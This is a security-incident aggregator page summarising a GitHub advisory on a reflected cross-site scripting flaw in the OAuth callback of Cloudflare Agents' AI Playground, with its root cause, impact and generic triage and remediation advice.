ASR AI Security Radar

Back to incidents

AI security incident: Cloudflare Agents is Vulnerable to Reflected Cross-Site Scripting in the AI Playgroun...

Incident date: February 13, 2026 | Published: February 25, 2026 | Source: GitHub Security Advisory | Classification confidence: 61%

This incident is part of the public archive and includes explicit AI-related signals from the cited source material. Review methodology.

Summary A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the AI Playground's OAuth callback handler. The error_description query parameter was directly interpolated into an HTML script tag without proper escaping, allowing attackers to execute arbitrary JavaScript in the context of the victim's session. Root cause The OAuth callback handler in site/ai-playground/src/server.ts directly interpolated the authError value, sourced from the error_description query parameter, into an inline tag. Impact An attacker could craft a malicious link that, when clicked by a victim, would: * Steal user chat message history - Access all LLM interactions stored in the user's session.

Why This Is AI-Related

This page is treated as AI-specific because the source material references llm, which places the issue inside an AI workflow, model, assistant, or supporting dependency rather than a generic software bulletin.

  • llm

Affected Workflow

Review the AI product, dependency, and integration points mentioned in the source advisory before broadening remediation.

Likely Attack Path

The advisory indicates a security path that can affect AI applications, assistants, models, or connected automation workflows if the component is deployed.

Impact

The advisory has meaningful security implications for an AI-related product, dependency, or workflow and should be triaged against deployed usage. Severity HIGH. Classification confidence 61%. Source channel GHSA.

Detection And Triage Signals

  • New security events tied to the affected component or advisory identifier
  • Changes in AI workflow behavior, access logs, or plugin execution after the advisory window
  • Evidence that the vulnerable version is active in environments that process sensitive data

Recommended Response

  • Confirm whether affected products, models, or integrations are used in your environment.
  • Apply vendor fixes or mitigations and restrict risky permissions until verified.
  • Monitor logs for related indicators and document containment for audit evidence.

Compliance And Business Impact

Even when exploit details are still emerging, delayed triage can widen operational and compliance exposure around AI systems.

Sources

Want alerts like this in real time?

Get notified with incident context, likely impact, and response guidance.

Get Notified

More incidents